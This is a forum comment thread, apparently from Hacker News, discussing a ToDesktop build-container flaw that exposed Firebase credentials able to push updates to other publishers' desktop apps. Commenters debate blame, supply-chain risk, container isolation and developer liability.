I don't get it. Why would it be "todesktop's fault" when all the mentioned companies allowed it to push updates?
I had these kinds of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd-party apps -- that's never right!
From the ToDesktop incident report:
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
I'm curious to know how much trial and error it took to get their machine to spit out the build, or if it was done in one shot.
This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
It also is; they are responsible for which tech pieces they pick when constructing their own puzzle.
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json are just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys) and even fewer security tools which acknowledge the real danger (protecting me from my computer's system files is far less valuable than protecting me from code pretending to be me as my own user - where all the really valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s, where the danger was "you damage the expensive computer" rather than "the data on the computer is worth orders of magnitude more than the computer".
It truly is a community issue, it's not a matter of the lang.
You will never live down fucking left-pad
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
https://en.m.wikipedia.org/wiki/Neko_(software)
Ah, whimsical memories of running that on the beige boxen of my youth.
Also remember a similar thing with some Lemmings randomly falling and walking around on windows.
Played way too long having them pile up and yank the window from under them.
I would've expected IDE developers to "roll their own"
- paid operating system (RHEL) with a team of paid developers and maintainers verifying builds and dependencies.
- empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like $20/mo for the OS, and like 2 days of dev work, which pays for itself in the long run by avoiding a mass of code you don't understand.
I made Signal fix this, but most apps consider it working as intended. We learned nothing from Solarwinds.
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
We have reviewed logs and inspected app bundles. No malicious usage was detected. There were no malicious builds or releases of applications from the ToDesktop platform.
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like?

This is why we need to remove incompetent product managers that have no clue and somehow are in the position to control what developers can work on.
This was an excellent conclusion for the article.
Bit too hyperbolic or whatever... Otherwise thrilling read!
This is completely incompetent to the point of gross negligence. There is no excuse for this
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
What?! It's not some kind of joke. This could _already_ literally kill people, steal money and ruin lives.
It isn't even an option for any app owner/author to avoid taking responsibility for the decisions which affect the security and safety of users.
It's as simple as this: no safety record to 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt from the liability, and should not.
Is it a kindergarten with "it's not me, it's them" play? It does not matter who failed; money could already have been stolen from random people (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions do not always make a bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
They can even charge for it ;)
Solution: more LLMs
Snap out of it
https://docs.github.com/en/code-security/code-scanning/intro...
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make their business model or employability advantage to take free code in the internet, add pumpkin spice and charge cash for it, they cross the line from pissing passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers lets take arms and defend. And defend quality software I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?
"Quality over quantity" should be the way, but I think it has failed in every single sector. Food. Healthcare. Education. Manufacturing. Construction. ...
Quality is expensive.